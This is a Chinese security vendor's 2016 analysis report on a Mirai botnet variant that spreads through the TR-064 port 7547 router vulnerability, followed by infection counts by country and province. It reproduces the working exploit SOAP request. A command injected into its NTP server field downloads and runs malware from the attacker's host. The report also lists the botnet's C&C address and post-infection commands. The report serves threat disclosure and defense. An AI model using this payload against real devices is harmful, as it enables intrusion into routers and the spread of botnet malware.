安天追影小组分析Mirai变种新传播方式
时间 : 2016年12月19日 来源: 安天
安天联合电信云堤发布针对Mirai新变种威胁分析报告,利用捕风蜜罐捕获到Mirai新变种,该变种采用最近公布的7547端口漏洞,并对公布漏洞的payload进行了修改使之可以下载执行Mirai。通过互联网流量监控发现了大量IoT设备进行7547端口扫描,这些设备已经被新Mirai变种攻陷,目前监测到超过30万IoT设备感染。
近期披露的D1000TR064 服务器 TCP 端口 7547漏洞,通过发送某些 TR 064 命令,可以指示运行该服务的设备打开防火墙上的 80端口。允许从互联网访问设备的web 管理界面。D1000 的默认登录密码是默认 Wi-fi 密码,也可以通过另一个TR064指令获取。该漏洞关键代码是向端口7547发送TR 064命令,设置新NTP服务器的方式,在NewNTPServer1中采用指令iptables -IINPUT -p tcp --dport 80 -j ACCEPT解除防火墙对80访问限制。以下是重要的代码片段:
Mirai变种的C&C配置加密方式与源码泄露的家族没有变化。连接C&C服务器timeserver.host(5.8.65.138)的23端口,上线包数据为0x00000001。
在被感染的路由器执行以下命令:
|
busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP busybox killall -9 telnetd |
第一个命令是关闭7547端口,是为了避免重复感染,也使其他攻击者不能再利用这个漏洞;第二个命令是停止telnet服务,使用户无法远程更新固件。然后,生成随机IP,对这些IP的7547端口进行扫描与漏洞入侵。样本利用7547漏洞进行了相应的改造,使攻击直接下载远程样本,修改可执行模式并且运行。该样本中包含三个远程样本URL,分别为:http://l.ocalhost.host/1、http:// l.ocalhost.host/2、http:// l.ocalhost.host/3。
攻击代码POST数据如下:
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/3;chmod 777 3;./3`</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
该放马域名l.ocalhost.host是黑客利用漏洞快速传播Mirai变种之前新注册2016年11月26日解析的IP包括两个:
2016-11-28 5.8.65.140
2016-11-27 188.209.49.60
通过电信云堤抽样流量分析获得如下信息:
-
确认被感染具有7547扫描能力的节点主要通过包括扫描节点自身是IoT设备,扫描节点多次使用相同端口扫描,扫描节点发出攻击漏洞方法进行发现。
-
确认感染设备总数:306778
-
感染设备主要开放服务或设备信息包括RomPager/4.07、DVRDVS、TR069 Connect Request Server、DHT Nodes、HuaweiHomeGateway。
目前发现感染的主要节点分布地区 (列表)
| 地区 | 感染设备总数 |
| 巴西 | 107166 |
| 英国 | 61854 |
| 爱尔兰 | 18268 |
| 拉美其它地区 | 17210 |
| 土耳其 | 13863 |
| 伊朗 | 11573 |
| 澳大利亚 | 8002 |
| 泰国 | 7159 |
| 意大利 | 6243 |
| 芬兰 | 5294 |
| 智利 | 4937 |
| 阿根廷 | 3659 |
| 中国 | 3321 |
| 法国 | 2160 |
| 巴基斯坦 | 2095 |
| 其它北美地区(非美国) | 1916 |
| 希腊 | 1712 |
| 罗马尼亚 | 1485 |
| 印度 | 1197 |
| 西班牙 | 1187 |
| 越南 | 761 |
| 俄罗斯 | 599 |
| 德国 | 529 |
| 美国 | 488 |
| 马来西亚 | 471 |
| 其它欧洲和中东地区 | 367 |
| 瑞典 | 352 |
| 玻利维亚 | 341 |
| 格鲁吉亚 | 341 |
| 其它欧洲地区 | 260 |
| 新西兰 | 224 |
| 塞尔维亚 | 169 |
| 捷克 | 140 |
| 南非 | 108 |
| 其它亚太地区 | 102 |
| 瑞士 | 98 |
| 哥伦比亚 | 91 |
| 阿尔巴尼亚 | 87 |
| 其它非洲地区 | 79 |
| 马达加斯加 | 75 |
| 摩洛哥 | 72 |
| 丹麦 | 69 |
| 波斯尼亚和黑塞哥维那 | 67 |
| 洪都拉斯 | 67 |
| 秘鲁 | 64 |
| 埃及 | 43 |
| 爱沙尼亚 | 33 |
| 日本 | 31 |
| 阿塞拜疆 | 30 |
| 波兰 | 27 |
| 圣马力诺 | 26 |
| 斯洛伐克 | 15 |
| 印度尼西亚 | 13 |
| 立陶宛 | 11 |
| 利比亚 | 11 |
| 阿曼 | 10 |
| 韩国 | 10 |
| 科威特 | 10 |
| 阿联酋 | 9 |
| 葡萄牙 | 9 |
| 奥地利 | 7 |
| 菲律宾 | 7 |
| 荷兰 | 7 |
| 乌克兰 | 7 |
| 叙利亚 | 6 |
| 阿尔及利亚 | 5 |
| 巴拉圭 | 5 |
| 塞内加尔 | 5 |
| 也门 | 5 |
| 巴勒斯坦 | 4 |
| 巴林 | 4 |
| 冈比亚 | 4 |
| 加拿大 | 4 |
| 卢森堡 | 4 |
| 马尔代夫 | 4 |
| 萨尔瓦多 | 4 |
| 伊拉克 | 4 |
| 比利时 | 3 |
| 哈萨克斯坦 | 3 |
| 拉脱维亚 | 3 |
| 新加坡 | 3 |
| 新喀里多尼亚 | 3 |
| 冰岛 | 2 |
| 科特迪瓦 | 2 |
| 黎巴嫩 | 2 |
| 挪威 | 2 |
| 沙特阿拉伯 | 2 |
| 坦桑尼亚 | 2 |
| 以色列 | 2 |
| 多米尼加 | 1 |
| 佛得角 | 1 |
| 黑山 | 1 |
| 加蓬 | 1 |
| 老挝 | 1 |
| 孟加拉 | 1 |
| 摩尔多瓦 | 1 |
| 莫桑比克 | 1 |
| 尼泊尔 | 1 |
| 尼日利亚 | 1 |
| 所罗门群岛 | 1 |
| 委内瑞拉 | 1 |
| 乌兹别克斯坦 | 1 |
| 亚美尼亚 | 1 |
国内部分感染节点分布图:
注:本图由电信云堤提供
国内感染节点分布表
| 省份 | 感染设备总数 |
| 广东省 | 508 |
| 江苏省 | 345 |
| 浙江省 | 240 |
| 福建省 | 219 |
| 湖北省 | 186 |
| 上海市 | 182 |
| 山东省 | 176 |
| 湖南省 | 148 |
| 四川省 | 131 |
| 河南省 | 107 |
| 北京市 | 94 |
| 广西省 | 93 |
| 安徽省 | 92 |
| 河北省 | 89 |
| 云南省 | 78 |
| 辽宁省 | 77 |
| 陕西省 | 62 |
| 天津市 | 56 |
| 江西省 | 55 |
| 山西省 | 55 |
| 贵州省 | 51 |
| 重庆市 | 51 |
| 吉林省 | 40 |
| 黑龙江省 | 38 |
| 甘肃省 | 31 |
| 香港 | 17 |
| 海南省 | 17 |
| 台湾 | 11 |
| 西藏自治区 | 5 |
| 宁夏回族自治区 | 4 |
| 青海省 | 2 |
| 澳门 | 尚未发现 |
参考文献链接:
[1]. http://www.vfocus.net/art/20161109/13085.html
[2]. https://www.broadband-forum.org/technical/download/TR-064.pdf
注:
本分析报告由安天追影小组与电信云堤联合发布,如您认为对网络安全有价值,请转载时注明,并附上链接。
本分析报告错漏缺点在所难免,敬请业内专家和研究者回帖指点批评指正。